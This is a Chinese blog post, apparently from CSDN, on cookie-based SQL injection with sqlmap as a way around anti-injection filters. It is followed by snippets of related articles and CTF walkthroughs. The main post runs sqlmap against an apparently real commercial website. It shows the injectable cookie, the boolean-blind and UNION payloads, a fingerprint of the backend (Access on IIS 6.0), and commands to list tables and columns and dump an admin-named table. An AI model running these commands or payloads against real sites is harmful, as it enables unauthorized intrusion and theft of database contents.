sqlmap指定cookie_sqlmap cookies站点的中转注入

最新推荐文章于 2024-07-24 15:27:34 发布
最新推荐文章于 2024-07-24 15:27:34 发布
阅读量127 收藏
点赞数
文章标签: sqlmap指定cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35401836/article/details/111968641
版权

如果说站点装了防注入程序 拿我们正规的注入就不成效果,就用到cookie中转注入

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2

Place: Cookie

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=230 AND 1870=1870

Type: UNION query

Title: Generic UNION query (NULL) - 15 columns

Payload: id=-3659 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(117)&CHR(120)&CHR(97)&CHR(113)&CHR(106)&CHR(83)&CHR(65)&CHR(100)&CHR(105)&CHR(111)&CHR(87)&CHR(110)&CHR(113)&CHR(112)&CHR(113)&CHR(113)&CHR(115)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16

---

[23:30:15] [INFO] the back-end DBMS is Microsoft Access

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft Access

[23:30:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xaweichi.com'

可以看到是cookies方式的注入

猜解表段也是一样的

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2

猜解字段

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2

然后猜解内容

[4 columns]

+---------+-------------+

| Column | Type |

+---------+-------------+

| classid | numeric |

| id | numeric |

| orderid | numeric |

| title | non-numeric |

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2

Gakki我老婆
关注
关于ctfhub中cookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 709
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库表sqlmap -u "http://challenge-593b57751..
sqlmap指定cookie_SQLMap使用
weixin_39628041的博客
01-30 2072
SQLMapsqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数​注意:必须指定至少一个目标-u#指定URL,必须使用双引号包含url--...
cookie注入中转工具
07-19
注入中转.exe,cookie注入工具,看谁下载。
SQL labs-SQL注入(五,使用sqlmap进行cookie注入
最新发布
2302_80280669的博客
07-24 654
Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":当用户访问 web 页面时,他的名字可以记录在 cookie 中。在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。
sqlmap指定cookie_SQLmapcookie注入测试
weixin_39568232的博客
12-24 823
最近公司系统在做安全方面的整改,有个接口可通过sql注入获取到用户数据库,进而获取到表及表结构信息。故,学习了sqlmap注入cookie注入相关知识,并做以总结。这是对一个接口做的简单sql注入测试:经过多次尝试,最终用cookie注入测试:sqlmap.py-u “url地址” –cookie “requests里面的set-cookie信息” --tables--time-sec=2...
sqlmapcookie注入(靶场第二题)
giun的博客
03-03 7139
sqlmap 靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb 首先我们尝试下sql注入 http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1 说明该网站有防cookie注入 ...
sqlmap指定cookie_sqlmap使用
weixin_42128393的博客
01-30 1472
kali中sqlmap的使用sqlmap简介:SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持Mysql、Oracle、MS-SQL、PostgreSQL与Access等数据库。SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包含数据库指纹、枚举、数据库提取,访问...
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器的潜在漏洞。在这个"sqlmap自动扫描器.zip"压缩包中,包含...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页...
sqlmap注入mysql_sqlmap注入系列(高级篇)
weixin_42107561的博客
01-30 987
前言:软件:burpsqlmap软件配置设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置漏洞环境安装数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt爆出数据库sqlmap -r "/root/22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T u...
cookie注入源码
04-24
cookie注入源码 asp cookie注入源码 cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了。
sqlmap指定cookie_sqlmap处理cookie数据
weixin_34061793的博客
12-24 1909
Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在web应用中至关重要,用户的唯一标识session id也是存在cookie中的。那么,在sqlmap使用的时候,也会经常需要考虑到cookiesqlmap也提供了和cookie相关的命令,本文将会介绍。1. cookie保存了用户登录状态很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器...
sqlmap指定cookie_利用SQLMap进行cookie注入
weixin_39640024的博客
01-14 458
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工具,比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入,就研究了 一下,发现其实sqlmap进行cookie注入很简单的。还不会使用sqlmap的同学可以学习一下这两篇本站推荐文章...
sqlmap指定cookie_sqlmap语法
weixin_36295500的博客
12-24 194
原标题:sqlmap语法1)判断当前用户是否是dbapython sqlmap.py -u "url" --is-dba -v 12)--users:列出数据库管理系统用户python sqlmap.py -u "url" --users -v 03)--passwords:数据库用户密码(hash)python sqlmap.py -u "url" --passwords -v 0python ...
sqlmap指定cookie_sqlmap
weixin_35732273的博客
01-30 234
sqlmap的一些使用技巧-v 3 显示注入过程的payload-d 直连数据库-u 检测sql注入-l log文件,可以是burp等代理的log文件-m target.txt 多个url检测-r 可将post请求方式保存在一个txt中,sqlmap通过post方式检测目标-g 使用google引擎 -g “inurl:\”.php”--data=DATA 指明参数是哪些(以post形式提交,并检...
【SQL注入10】cookie注入基础及实践(基于BurpSuite工具和Sqli-labs-less20靶机平台)
Fighting_hawk的博客
02-21 4186
1. 了解get、post注入cookie注入的区别。 2. 掌握cookie注入的方法。
记一次Cookie中转注入接触
K_K__K的博客
09-06 664
背景:今日,吃完午饭,坐在电脑旁,合上了那本前天刚到手的sql查询的艺术,深深的打了哈欠,伸了个懒腰。眼睛往电脑屏幕上扫了一眼,看见了Cookie注入,这对于已经看完sql查询的我来说,还是那么陌生。我擦了擦那本去年买来的sql注入那本书,有滋有味的找到了Cookie注入。嗯,没错,这一年来我还是有进步的,我已经能看懂十分之一了。好吧,开始网上搜集大佬们的各种博客,确实找到了很多,所以来记录下我和...
ctfhub cookie注入
Gi_iGablist的博客
11-01 135
首先,下载burpsuite,具体教程就不多说了,以下就用此工具完成这道题。 经过一系列步骤查找到数据库名:sqil,更换id:123+union++select+database(),2#, 查询表名 查询字段名 查询字段信息 拿到flag ...
sqlmap指定cookie
06-11
要使用 SQLMap 指定 Cookie,可以使用以下命令: ``` python sqlmap.py -u "http://example.com/page.php" --cookie="name=value; name2=value2" ``` 其中,`http://example.com/page.php` 是需要测试的网址,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值